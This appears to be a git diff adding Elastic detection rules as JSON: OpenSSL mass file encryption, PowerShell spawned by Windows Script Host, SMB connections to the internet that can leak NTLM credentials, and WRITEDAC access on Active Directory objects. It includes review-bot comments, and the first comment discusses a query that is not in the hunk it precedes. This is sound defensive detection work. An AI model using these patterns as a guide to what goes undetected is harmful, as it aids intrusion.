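Review bot: The `query` relies on `winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege"` against a field that `required_fields` declares as `keyword`, so unless the ingest pipeline splits PrivilegeList into one value per privilege, a 4704 event that grants several rights in a single assignment is not an exact match and the alert is missed. Please confirm the split happens in the windows/system integration pipelines, or relax the clause to `winlog.event_data.PrivilegeList:*SeEnableDelegationPrivilege*`. As with the other rule files in this diff, this appears to be a generated snapshot, so the fix may need to go upstream.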
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Data Encryption via OpenSSL Utility", + "query": "sequence by host.id, user.name, process.parent.entity_id with maxspan=5s\n [ process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.name == \"openssl\" and process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl*\", \"php*\", \"python*\", \"xargs\") and\n process.args == \"-in\" and process.args == \"-out\" and\n process.args in (\"-k\", \"-K\", \"-kfile\", \"-pass\", \"-iv\", \"-md\") and\n /* excluding base64 encoding options and including encryption password or key params */\n not process.args in (\"-d\", \"-a\", \"-A\", \"-base64\", \"-none\", \"-nosalt\") ] with runs=10\n", + "references": [ + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { 
+ "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json new file mode 100644 index 00000000000..ab7674879a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json 
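Review bot: `index` stays at the broad `logs-endpoint.events.*` even though the `query` is a pure `process where` sequence, whereas other rules in this diff (f44fa4b6 _108, f545ff26 _111) were narrowed to the data stream their query reads; if that narrowing is intended for the package, this rule should read `"logs-endpoint.events.process-*"` as well. The _6 hunk directly below carries the same index pattern and is the current revision where the change would land; the _5 file is the superseded snapshot and would stay as is.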
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Data Encryption via OpenSSL Utility", + "query": "sequence by host.id, user.name, process.parent.entity_id with maxspan=5s\n [ process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.name == \"openssl\" and process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl*\", \"php*\", \"python*\", \"xargs\") and\n process.args == \"-in\" and process.args == \"-out\" and\n process.args in (\"-k\", \"-K\", \"-kfile\", \"-pass\", \"-iv\", \"-md\") and\n /* excluding base64 encoding options and including encryption password or key params */\n not process.args in (\"-d\", \"-a\", \"-A\", \"-base64\", \"-none\", \"-nosalt\") ] with runs=10\n", + "references": [ + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { 
+ "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json new file mode 100644 index 00000000000..cd0fd143158 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Executing PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\" and\n not (\n process.parent.name : \"wscript.exe\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\IntuneDriveMapping-VBSHelper.vbs\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\DriveMapping.ps1\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: 
Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json new file mode 100644 index 00000000000..1d71ba1390a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Executing PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\" and\n not (\n process.parent.name : \"wscript.exe\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\IntuneDriveMapping-VBSHelper.vbs\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\DriveMapping.ps1\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: 
Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json new file mode 100644 index 00000000000..4af3afa1a43 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Rare SMB Connection to the Internet", + "new_terms_fields": [ + "destination.ip" + ], + "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "references": [ + "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + 
"ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json new file mode 100644 index 00000000000..5dec5533bc5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_3.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.network-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Rare SMB Connection to the Internet", + "new_terms_fields": [ + "destination.ip" + ], + "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "references": [ + "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + 
}, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json new file mode 100644 index 00000000000..129e060c0b2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_3.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "WRITEDAC Access on Active Directory Object", + "query": "event.action:\"Directory Service Access\" and event.code:\"5136\" and\n winlog.event_data.AccessMask:\"0x40000\"\n", + "references": [ + "https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors.pdf" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + } + ], + "risk_score": 21, + 